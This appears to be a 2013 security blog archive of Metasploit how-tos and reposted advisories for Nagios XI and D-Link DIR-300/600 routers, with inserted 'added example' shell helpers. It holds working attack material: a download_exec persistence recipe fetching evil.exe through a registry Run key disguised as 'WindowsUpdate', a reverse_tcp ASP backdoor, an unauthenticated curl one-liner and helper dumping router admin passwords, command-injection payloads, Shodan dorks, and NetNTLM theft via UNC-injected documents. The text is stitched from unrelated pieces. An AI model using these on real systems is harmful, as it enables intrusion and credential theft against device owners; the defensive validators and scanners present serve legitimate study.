Feb 7, 2013

Howto: Metasploit Use Postgresql

1. Switch to the postgres user
- su postgres

2. Create User for Metasploit
-  createuser msf_user -P

3. Create Database.
- createdb --owner=msf_user msf_database

4. Get the Metasploit Console
- msfconsole

5. Connect to PostgreSQL from msfconsole (the password is the one you entered in step 2)
- db_connect msf_user:msf_password@localhost/msf_database

6. Done.
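
The five steps above as shell functions, added here as an example and not part of the original how-to. The names msf_user and msf_database are the page's; the password is a placeholder you choose; a local PostgreSQL with the psql client is assumed. It also writes ~/.msf4/database.yml, which msfconsole reads at start-up so that db_connect is not needed in every session, and it refuses passwords that the user:pass@host/db syntax of db_connect cannot carry.

```shell
#!/bin/sh
# Added example, not part of the original how-to: the same setup as
# steps 1-5, as shell functions. msf_user / msf_database come from the
# steps above; the password is a placeholder. Assumes a local PostgreSQL
# with the psql client installed.

# SQL equivalent of `createuser msf_user -P` and `createdb --owner=...`.
# Single quotes in the password are doubled so they cannot end the literal.
msf_db_sql() {
  user="$1" db="$3"
  pass=$(printf '%s' "$2" | sed "s/'/''/g")
  printf "CREATE ROLE %s LOGIN PASSWORD '%s';\n" "$user" "$pass"
  printf "CREATE DATABASE %s OWNER %s;\n" "$db" "$user"
}

# The db_connect line from step 5. The user:pass@host/db form has no
# escaping, so a password containing ':' '@' or '/' is refused here;
# use database.yml (below) for such passwords.
msf_db_connect_string() {
  user="$1" pass="$2" host="$3" db="$4"
  case "$pass" in
    *[:@/]*) echo "password contains ':' '@' or '/': use database.yml instead" >&2; return 1 ;;
  esac
  printf 'db_connect %s:%s@%s/%s\n' "$user" "$pass" "$host" "$db"
}

# ~/.msf4/database.yml: msfconsole reads this at start-up and connects
# without a db_connect each session.
msf_database_yml() {
  user="$1" pass="$2" host="$3" port="$4" db="$5"
  cat <<EOF
production:
  adapter: postgresql
  database: $db
  username: $user
  password: "$pass"
  host: $host
  port: $port
  pool: 5
  timeout: 5
EOF
}

# Usage (as the postgres superuser, i.e. after `su postgres`):
#   msf_db_sql msf_user 'S3cret' msf_database | psql
#   msf_database_yml msf_user 'S3cret' localhost 5432 msf_database > ~/.msf4/database.yml
#   msf_db_connect_string msf_user 'S3cret' localhost msf_database   # paste into msfconsole
```

Keep database.yml readable only by the account that runs msfconsole; it holds the database password in clear text.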

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Feb 6, 2013

Howto: Single, Staged, Stagers Payload Of Metasploit

If you want to know about the 'Single', 'Staged' and 'Stager' payload types of Metasploit, please go to the Source.

Singles are great for fire and forget. I've used them as payloads for USB sticks (so the machine didn't have to have a connection to do what I needed) all the way to a pretty sneaky persistence method. One that I used quite often at CCDC was with the payload 'windows/download_exec'. The only option this single has is 'URL'. We would put something like http://www.redteam.com/evil.exe and generate the binary:

(Yes you can use msfpayload, or msfvenom on the command line to generate payloads, but I like to stay inside of msfconsole)

Then set it to auto-start when someone logs in, with something like:
meterpreter > reg setval -k "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" -v "WindowsUpdate" -d "C:\\Windows\\dropper.exe"

Now all we had to do was wait for logins. If they happened to find our evil.exe binary (download_exec saves it as 'a.exe' in System32) and blocked our IP, all we had to do was replace evil.exe on our web server and wait for it to download the new one. A crude form of persistence, but it worked well.

Feb 5, 2013

Nagios XI 2012R1.5b XSS / Command Execution / SQL Injection / CSRF

If you want to get full detail, please go to the Source.

Reflected XSS:

Alert Cloud Component:
Example URL:
alert('xss'); var aa={"a" : {"b" : "
The vulnerable code in Alert Cloud's index.php appears to have been copied and pasted into several other components as well.

Escalation Wizard:
Example URL:

Stored XSS:

Nagios QL (aka Legacy Nagios Core Configuration Manager):
as the config name of a host escalation entry will result in the JavaScript being executed when a user tries to delete that host escalation entry.
I believe that the Legacy Nagios Core Configuration Manager and the (regular, non-legacy) Core Configuration Manager share configuration settings in a database. I was unable to test whether script injected via Nagios QL could be executed by using the (regular) Core Configuration Manager because the (regular) Core Configuration Manager appears to be broken in this release (?).
Command Execution:

Autodiscovery does not filter input properly. Any user can submit new jobs, even regular user accounts with read-only access. Autodiscovery may not appear in the menu for some users; it may be necessary to browse directly to the autodiscovery page.
Example (as the scan target): \; cat /etc/passwd \;
Then look at the job results.
Due to what seems to be (as far as I can tell) a very poorly thought out sudo rule, a user could upload a custom nmap script to the server and run it (through sudo) for easy root access. Yes, there is a sudo rule that allows apache to run nmap as root.
Autodiscovery requires manual activation before it can be used (and this vulnerability exploited).
Autodiscovery does use a nonce, but this can be bypassed with XSS.
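
The check the Autodiscovery scan-target field is missing, written as an added example (not from the advisory and not Nagios XI code). It is in the shell because that is where the value ends up, as an argument to nmap. The rejected sample is the advisory's own payload; the accepted samples and the `nmap -sn` invocation are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the advisory or from Nagios XI: an allow-list
# check of the kind the Autodiscovery scan-target field lacks. The value
# is validated first and then passed to nmap as a single argv word, never
# interpolated into a shell command string.

# Accept only an IPv4 address with optional /prefix, or a hostname made of
# letters, digits, '-' and '.'. Spaces, ';', quotes and backslashes never
# match, so `\; cat /etc/passwd \;` is rejected before any command is built.
valid_scan_target() {
  printf '%s\n' "$1" | grep -Eq \
    '^([0-9]{1,3}\.){3}[0-9]{1,3}(/[0-9]{1,2})?$|^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$'
}

# Build the scan the safe way: validate, then pass the target as one word.
# (Hypothetical wrapper; the real Autodiscovery code is not on this page.)
run_discovery_scan() {
  target="$1"
  if ! valid_scan_target "$target"; then
    echo "rejected scan target: $target" >&2
    return 1
  fi
  nmap -sn "$target"
}

# Usage:
#   run_discovery_scan '192.168.1.0/24'          # runs nmap
#   run_discovery_scan '\; cat /etc/passwd \;'   # rejected, exit status 1
```

Validation alone does not fix the second problem the advisory describes: as long as sudo lets the apache user run nmap as root, anyone who can reach that rule can load an arbitrary NSE script. The allow-list only closes the injection path; the sudo rule needs to go or be tightened separately.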
Not sure what to call this, content spoofing maybe?
Whatever you would call it, this could be used for phishing (or whatever).
Nagios XI Admin Panel:
SQL Injection:

Sorry about the poor examples below, they should be enough to demonstrate the point though.

NagiosQL (aka Legacy Nagios Core Configuration Manager):
Example URL:
Vulnerable Code:
    // $_GET['cname'] is concatenated straight into the query: no cast, no escaping, no bound parameter
    if (isset($_GET['cname']) && ($_GET['cname'] != "")) {
        $strResult = $myDBClass->getFieldData("SELECT command_line FROM tbl_command WHERE id='".$_GET['cname']."'");
    }
There are other pages in NagiosQL that are also vulnerable.

Escalation Wizard:
Example URL:

D-Link DIR-600 / DIR-300 Command Execution / Bypass / Disclosure

If you want to get full detail, please go to the Source.

============ Vulnerable Firmware Releases - DIR-300: ============
Firmware Version : 2.12 - 18.01.2012
Firmware Version : 2.13 - 07.11.2012
============ Vulnerable Firmware Releases - DIR-600: ============
Firmware-Version : 2.12b02 - 17/01/2012
Firmware-Version : 2.13b01 - 07/11/2012
Firmware-Version : 2.14b01 - 22/01/2013
============ Device Description: ============
D-Link® introduces the Wireless 150 Router (DIR-600), which delivers high performance end-to-end wireless connectivity based on 802.11n technology. The DIR-600 provides better wireless coverage and improved speeds over standard 802.11g*. Upgrading your home network to Wireless 150 provides an excellent solution for experiencing better wireless performance while sharing a broadband Internet connection with multiple computers over a secure wireless network.
============ Shodan Dorks ============
Shodan search:
Server: Linux, HTTP/1.1, DIR-300
Server: Linux, HTTP/1.1, DIR-600
============ Vulnerability Overview: ============
    * OS Command Injection (unauthenticated)
=> Parameter cmd
The vulnerability is caused by missing access restrictions and missing input validation in the cmd parameter and can be exploited to inject and execute arbitrary shell commands.
It is possible to start a telnetd to compromise the device.
WARNING: You do not need to be authenticated to the device!
starting a telnet server:
POST /command.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 15
Cookie: uid=hfaiGzkB4z
Pragma: no-cache
Cache-Control: no-cache
You do not need to be authenticated to the device for executing the malicious commands. You could prepare the whole request and execute it without any authentication details.
For example you could start the telnetd on other ports and interfaces. So with this you are able to get a full shell *h00ray*
Nmap Scan after starting the telnetd:
Nmap scan report for
Host is up (0.022s latency).
Not shown: 995 closed ports
1/tcp     filtered tcpmux
23/tcp    open     telnet  BusyBox telnetd 1.14.1 <<==!!!
    * Information disclosure:
Nice server banner to detect this type of devices easily:
Server: Linux, HTTP/1.1, DIR-300 Ver 2.12
Server: Linux, HTTP/1.1, DIR-600 Ver 2.12
    * Password change does not ask for the current password
Changing the password does not require the current one, so an attacker with access to an authenticated browser session can set a new password without knowing the old one.
    * Insecure Cryptographic Storage:
There is no password hashing implemented and so it is saved in plain text on the system:
# cat var/passwd
"admin" "test" "0"
Positive Technologies has released an advisory in 2011 and D-Link has fixed this issue:
With the current version of the firmware the passwords are stored again in plaintext.
If you combine the plaintext credential vulnerability with the unauthenticated os command injection vulnerability you will get the following one liner to extract the admin password from every vulnerable device:
root@bt:~# curl --data "cmd=cat /var/passwd" http://<Target IP>/command.php
"admin" "THESECRETPASS" "0"
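
Triage helpers for this issue, added here as an example and not part of the advisory. The banner strings and the /var/passwd line format are the advisory's own output; the version match follows its "Vulnerable Firmware Releases" list (versions not on the list are untested here, not known to be safe). The `curl` wrappers need network access to a device and are not exercised offline; the address in the usage note is a placeholder.

```shell
#!/bin/sh
# Added example, not part of the advisory: check a Server banner against
# the advisory's vulnerable-firmware list and parse the /var/passwd line
# that the unauthenticated command.php request returns.

# 0 if a Server header names a firmware the advisory lists as vulnerable.
is_affected_banner() {
  case "$1" in
    *"DIR-300 Ver 2.12"*|*"DIR-300 Ver 2.13"*) return 0 ;;
    *"DIR-600 Ver 2.12"*|*"DIR-600 Ver 2.13"*|*"DIR-600 Ver 2.14"*) return 0 ;;
    *) return 1 ;;
  esac
}

# Pull the password out of a /var/passwd line: "admin" "THESECRETPASS" "0"
passwd_field() {
  printf '%s\n' "$1" | sed -n 's/^"[^"]*" "\([^"]*\)" "[^"]*"$/\1/p'
}

# Live helpers (need network access to the device; not exercised offline).
server_banner() {
  curl -s -m 5 -I "http://$1/" | sed -n 's/^[Ss]erver: //p' | tr -d '\r'
}
dump_passwd() {
  # the advisory's one-liner: unauthenticated POST to command.php
  curl -s -m 5 --data "cmd=cat /var/passwd" "http://$1/command.php"
}

# Usage (192.0.2.1 is a placeholder):
#   host=192.0.2.1
#   if is_affected_banner "$(server_banner "$host")"; then
#     dump_passwd "$host" | while IFS= read -r line; do passwd_field "$line"; done
#   fi
```

The banner is only a hint: it reports the major version, so a device that matches should be confirmed with the command.php request rather than assumed exploitable, and a device that does not match is not thereby shown to be patched.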
    * Information Disclosure:
Detailed device information including Model Name, Hardware Version, Linux Kernel, Firmware version, Language and MAC Addresses are available via the network.
or try to access version.txt and have a look at the html source ;)
HTTP/1.1 200 OK
Server: Linux, HTTP/1.1, DIR-600 Ver 2.14
Date: Fri, 31 Dec 1999 18:04:13 GMT
Content-Length: 267
Firmware External Version: V2.14
Firmware Internal Version: d1mg
Model Name: DIR-600
Hardware Version: Bx
WLAN Domain: 826
Language: en
Graphcal Authentication: Disable
LAN MAC: <snip>
WAN MAC: <snip>
WLAN MAC: <snip>
These details are available without authentication.
    * Local path disclosure
Every piece of information is interesting for the attacker. With this we will get some more details about the operating system and its paths.
HTTP/1.1 200 OK
Server: Linux, HTTP/1.1, DIR-300 Ver 2.12
Date: Sat, 01 Jan 2000 21:22:43 GMT
Content-Type: text/xml
Content-Length: 49
EPHP: dophp(load,/htdocs/widget/.xml) ERROR (-1)
    * Stored XSS via WLAN Assistent and Version Details
Injecting scripts into the parameter SSID reveals that this parameter is not properly validated for malicious input.
=> Parameter: SSID
The injected code gets executed if you try to access the file version.txt. For this you do not need to be authenticated :)
============ Solution ============
No known solution available.
============ Credits ============
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de

Howto: Exploit WebDav with Metasploit

Modules and steps you will use to pwn the web server:

1. auxiliary(webdav_scanner)
2. auxiliary(webdav_internal_ip)
3. auxiliary(webdav_website_content)
4. auxiliary(webdav_test)
5. exploit(handler)
6. Create backdoor with msfpayload and msfencode
./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=443 R |
./msfencode -t asp -o tcp443meterp.asp
Source: http://carnal0wnage.attackresearch.com/2010/05/more-with-metasploit-and-webdav.html 

RIPS v-0.54: a static source code analyser for vulnerabilities in PHP web applications.

RIPS is a tool written in PHP to find vulnerabilities in PHP applications using static code analysis. By tokenizing and parsing all source code files, RIPS is able to transform PHP source code into a program model and to detect sensitive sinks (potentially vulnerable functions) that can be tainted by user input (influenced by a malicious user) during the program flow. Besides the structured output of found vulnerabilities, RIPS also offers an integrated code audit framework for further manual analysis.

Source: http://seclist.us/2013/02/update-rips-v-0-54-a-static-source-code-analyser-for-vulnerabilities-in-php-webapplications.html

Feb 4, 2013

Google Dork For Lotus Notes

Try it at your own risk.

inurl:nsf filetype:nsf nsf?Opendatabase

VMinjector Tool to Unlock guest VMs

You can use this tool to get past the login screen of a locked guest VM and then change the password to recover the account, or use it as a PoC during a pentest engagement.

Source: https://github.com/batistam/VMInjector

Feb 3, 2013

Stealing netNTLM credentials by injecting UNC path into .docx

If you want to see full details, please go to the Source.

AUX Module
1. use auxiliary/docx/word_unc_injector
2. set SKLOUTPUTPATH /output/path
3. run

Post Module
1. use multi/handler
2. set PAYLOAD windows/meterpreter/reverse_tcp
3. exploit
   .... get the meterpreter session
4. use post/multi/injector/word_unc_injector
5. set FILE TARGET\File
6. exploit
7. Open another Metasploit console
8. use auxiliary/server/capture/smb
9. run
10. Wait for the user to open the document.

Source: http://jedicorp.com/security/exploit-dev/stealing-netntlm-credentials-by-injecting-unc-path-into-docx/         
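
The defender's side of the technique, added here as an example that is not from the original post or from Metasploit. word_unc_injector works by giving a relationship inside the document package a UNC Target (\\host\share\...), so Word reaches out over SMB and sends the user's NetNTLM response when the file is opened; this scans a .rels file for such targets. The sample XML is constructed, the IP in it is a placeholder, and the `scan_docx` wrapper assumes `unzip` is installed.

```shell
#!/bin/sh
# Added example, not from the original post or from Metasploit: find
# externally-targeted UNC relationships in a .docx, the artefact that
# word_unc_injector leaves behind.

# Read a .rels XML on stdin; print each external Target that is a UNC path.
# Splitting on '>' puts one Relationship element per line; the sed keeps
# only targets that start with two backslashes.
find_unc_targets() {
  tr '>' '\n' \
    | grep -i 'TargetMode="External"' \
    | sed -n 's/.*Target="\(\\\\[^"]*\)".*/\1/p'
}

# Scan a whole .docx (it is a zip). Assumes `unzip`; not exercised offline.
scan_docx() {
  unzip -p "$1" 'word/_rels/*.rels' 2>/dev/null | find_unc_targets
}

# Constructed sample: one normal internal relationship and one injected
# external relationship pointing at an attacker SMB share (placeholder IP).
SAMPLE_RELS=$(cat <<'EOF'
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="\\192.0.2.10\share\logo.png" TargetMode="External"/></Relationships>
EOF
)

# Usage:
#   printf '%s\n' "$SAMPLE_RELS" | find_unc_targets   # -> \\192.0.2.10\share\logo.png
#   scan_docx suspicious.docx
```

A hit is worth correlating with outbound SMB (TCP 445) from the workstation to the named host; blocking outbound 445 at the perimeter is what stops the credential leak regardless of how the document was crafted.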

HostBox SSH

HostBox SSH is an SSH password/account scanner written in Python.

Source: http://packetstormsecurity.com/files/119996/HostBox-SSH-0.2.html 

OSX apps (TextEdit) crashing in spell-checker

If you type "File:///" in a Mac OS X application that uses the system spell checker (TextEdit, for example), it crashes; the bug report is below.

OSX apps (TextEdit) crashing in spell-checker (I think).

Number: rdar://13128709
Date Originated: 1/31/2013
Status: Open
Resolved:
Product: OSX
Product Version: 10.8.2
Classification: Crash
Reproducible: Always

Open TextEdit.
Type "File:///". The capital 'F' is important. On the third /, it crashes.

2013-01-31 15:19:47.422 TextEdit[34715:6903] assertion on /SourceCache/DataDetectorsCore/DataDetectorsCore-269.1/Sources/PushDown/DDResultExtraction.c:1576 "CFStringHasPrefix(urlVal, CFSTR("file://"))" failed :wrong extraction: File:///
2013-01-31 15:19:47.423 TextEdit[34715:6903] wrong extraction: File:///
2013-01-31 15:19:47.424 TextEdit[34715:6903] An uncaught exception was raised
2013-01-31 15:19:47.424 TextEdit[34715:6903] condition "wrong extraction: File:///"
2013-01-31 15:19:47.425 TextEdit[34715:6903] (
 0   CoreFoundation                      0x00007fff949770a6 __exceptionPreprocess + 198
 1   libobjc.A.dylib                     0x00007fff8e3023f0 objc_exception_throw + 43
 2   CoreFoundation                      0x00007fff94976e7c +[NSException raise:format:] + 204
 3   DataDetectorsCore                   0x00007fff8bf144f3 DDCrashv + 113
 4   DataDetectorsCore                   0x00007fff8bf145a6 DDCrash + 148
 5   DataDetectorsCore                   0x00007fff8bedfbd4 DDResultCopyExtractedURL + 718
 6   AppKit                              0x00007fff921dbd1a checkDataDetectors + 536
 7   AppKit                              0x00007fff921d9429 NSSpellCheckerCheckString + 13334
 8   AppKit                              0x00007fff921d5f9f -[NSTextCheckingOperation main] + 152
 9   Foundation                          0x00007fff8ad2f986 -[__NSOperationInternal start] + 684
 10  Foundation                          0x00007fff8ad371a1 __block_global_6 + 129
 11  libdispatch.dylib                   0x00007fff8e8caf01 _dispatch_call_block_and_release + 15
 12  libdispatch.dylib                   0x00007fff8e8c70b6 _dispatch_client_callout + 8
 13  libdispatch.dylib                   0x00007fff8e8c81fa _dispatch_worker_thread2 + 304
 14  libsystem_c.dylib                   0x00007fff91ab9cab _pthread_wqthread + 404
 15  libsystem_c.dylib                   0x00007fff91aa4171 start_wqthread + 13

The Big List Of Metasploit Videos [If you want to be a master of Metasploit, I recommend watching them]

SecurityAegis.com has posted a very interesting big list of videos about Metasploit. You can learn about, and gain experience in, using Metasploit, writing for it and real hacking with it. Try it from the Source. :)

Source: http://www.securityaegis.com/the-big-fat-metasploit-post/ 

Password Hashes Dump Tools By Bernardo Damele A. G.

This is a list of tools that are useful to a pentester for dumping password hashes.

 Download Link:: http://dl.dropbox.com/u/2330423/Copy%20of%20Password%20hashes%20dump%20tools.xlsx
Source: https://docs.google.com/spreadsheet/ccc?key=0Ak-eXPencMnydGhwR1VvamhlNEljVHlJdVkxZ2RIaWc&utm_source=buffer&buffer_share=ec1fb#gid=0 